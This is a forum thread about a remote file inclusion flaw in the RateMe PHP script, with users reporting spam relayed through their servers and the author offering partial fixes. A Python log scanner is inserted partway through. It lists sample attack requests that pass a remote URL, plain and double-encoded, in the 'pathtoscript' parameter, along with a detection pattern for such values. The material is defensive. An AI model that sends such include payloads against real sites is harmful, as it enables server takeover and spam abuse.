- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
security exploit
My web host just informed me for the 2nd time in the past few months, that the script was used to send unsolicited emails. Is there a patch to fix any recent security issues anyone else has experienced?
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
I've communicated with one other user of this script and they indicated experiencing this security problem as well.
I'm not exactly sure how a hacker somehow uses the script to send spam from my website server. In any event, Lukas replied to a recent email of mine indicating that it's not something he has the time to work on right now, but suggested that if I or anyone finds/writes a solution, they post it here.
Any help from another user familiar with the problem is much appreciated.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Perhaps the following will shed light on the security problem (from an email from my webhost):
We have a firewall in place which monitors all activity; we can track and see which processes are running and their root path.
At the time of the exploit, this is what we found (listed below). As soon as we removed permissions to the “photo” folder, the exploit immediately stopped. We had a couple of processes running at the same time and a massive amount of phishing emails were being relayed through your account.
Here are the files which were being executed at the time.
/pathtoscript/photo/
OLDadmin.inc.php add.inc.php admin.inc.php edit.inc.php funcs.inc.php showres.inc.php
It appears CHMOD is not the issue with the script.
Last edited by jcliff (16-02-2007 20:31:51)
- martin
- Member
- Registered: 29-07-2005
- Posts: 12
Re: security exploit
I am the other user who contacted Lukas from planetluc regarding this issue.
My server was severely compromised due to the security hole in RATEME. Hackers were able to infiltrate my server, install hacks that would send out tons of spam containing links to phishing sites that they installed on my server through RATEME.
The hackers then installed additional hacks on my server which allowed them to view the entire directory of my server, all files, etc.
Users of RATEME should be informed about the severity of this issue.
The fact that the author of this script is not inclined to show support for this script clearly shows a lack of understanding on how serious the issue is. Furthermore, it also clearly shows that security is not an important issue for the author, which leads me to believe serious security holes could very well be present in the other scripts sold on this website. And if they do, you will likely not receive support for any of your troubles...
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
RateMe is (better 'was') the only script on this server you had to pay for. Any other scripts are free. And maybe yes, maybe there are security lacks in those scripts, but you use those scripts at your own risk.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
Sure - I apologise for all inconveniences that occurred using this script. But let's be honest, you cannot expect a 16 dollar script to work as flawlessly and securely as a $200 script does. Right?
When I did this script I could not consider all eventualities of a hacker to abuse it.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Personally, I'm not nearly as disappointed in the fact that a security exploit existed. Shit happens and it's not like it was intended. The impact of being hacked sucks, but it happens; it's a constant battle on the web. It would be unfair and unrealistic to expect that such a problem could never emerge.
I find the indifference expressed by the response of "I'm busy" much more troubling. Who's not busy?
Whether the script costs $1 or $100, whether future releases were planned or not, I find the notion that someone capable of authoring the script doesn't have even a mere matter of hours to at least investigate potential solutions, offer suggestions, collaborate with others that purchased the script, etc...well...irritating to be kind.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
Ok guys, let's try this as a fix (I'm not too sure whether this solves all our problems but let's try).
1. open add.inc.php
2. go to line 23 and add before
this should at least check whether it is a JPG file that is being uploaded.
3. then we do about the same in edit.inc.php, so open it
4. go to line 26 and replace it by
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
No, the quick fix above does not cover this security hole.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
The '/forum/main.inc.html' script does not properly validate user-supplied input in the 'pathtoscript' parameter.
A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location.
As is, anyone that has purchased this script can no longer use it.
Is there any chance a modification to that one file could be provided?
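The remote-include flaw described above (a request-supplied pathtoscript value that the script passes to include) leaves a trace in the web server's access log. The following Python is an added example written for this thread, not the forum's or RateMe's code; it assumes Apache combined-format logs and that pathtoscript is the only include-path parameter, and the log lines it scans are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines for illustration; the addresses
# are documentation ranges and the remote host is invented.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Feb/2007:20:31:51 +0100] "GET /rateme/main.inc.php?id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Feb/2007:20:32:10 +0100] "GET /rateme/main.inc.php?pathtoscript=http://203.0.113.77/x.txt HTTP/1.1" 200 1024 "-" "libwww-perl/5.805"
198.51.100.9 - - [16/Feb/2007:20:32:11 +0100] "GET /rateme/main.inc.php?pathtoscript=%68ttp%3A%2F%2F203.0.113.77%2Fx.txt HTTP/1.1" 200 1024 "-" "libwww-perl/5.805"
192.0.2.44 - - [16/Feb/2007:20:33:02 +0100] "POST /rateme/add.inc.php HTTP/1.1" 200 200 "-" "Mozilla/5.0"
"""

# Request line of the combined log format: client, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A filesystem path parameter should never carry a URL scheme or PHP stream wrapper.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?|php|data):', re.IGNORECASE)

# Parameters the script uses as an include base. The thread names only
# pathtoscript; extend this set for your own copy of the script (assumption).
PATH_PARAMS = {"pathtoscript"}


def find_rfi_attempts(log_text, path_params=PATH_PARAMS):
    """Return one dict per request whose include-path parameter points off-host."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name.lower() not in path_params:
                continue
            for value in values:
                # parse_qs already decoded once; decode again to catch
                # double-encoded values such as %2568ttp.
                decoded = unquote(value)
                if REMOTE_SCHEME_RE.match(decoded):
                    hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "status": m.group("status"),
                                 "param": name, "value": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['param']}={hit['value']} (HTTP {hit['status']})")
```

A 200 status on a flagged request means the include most likely succeeded, so treat it as a compromise indicator rather than a blocked attempt.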
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
Well, another quick fix is:
- open the main.inc.php file
- go to the beginning of the code, about line 14
- add the following code block
- save it
- upload it onto your server again
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Thanks!
I've made the change and contacted my website hosting company to let them know we have something to test/run.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
Ok, let us know whether this works effectively.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
So far so good -- the script is working, and being monitored by my webhost -- no reported hacks.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
- martin
- Member
- Registered: 29-07-2005
- Posts: 12
Re: security exploit
Hi guys, any news on this issue? I received an email a few weeks ago from jcliff mentioning that the fix listed above was not enough according to his server admins.
Here is something I have found: http://www.securityfocus.com/archive/1/454708
Luc, any idea how we could patch the script further to make it really secure?
I hate to insist, but I didn't find any other script out there that has the simplicity I need from rateme.
Thanks,
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
I've been informed by my webhost that the script has been exploited recently.
Has there been any modification to the code since the last problem?
Has anyone else experienced this problem (as I recall, the last time this began happening several sites had reports about the exploit and how it was happening)?
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Excuse me, but I find it troubling to read new posts regarding the sale of this script, and I understand that ongoing support has been offered as some sort of "buyer beware" -- but with a known security issue (as has been linked previously in this thread months ago), I would think the issue would be addressed more promptly.
Is the "fix" at this point to merely hope that the script doesn't get hacked???
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
Well, the exploit described in the link 2 posts ago was fixed.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
admin wrote: Well, the exploit described in the link 2 posts ago was fixed.
I'll try to get more details in terms of how, but as it was explained to me by my webhost, they've shut the directory down in which the script was located because it was exploited again.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
...maybe some specific info from your hosting company would help improve this script.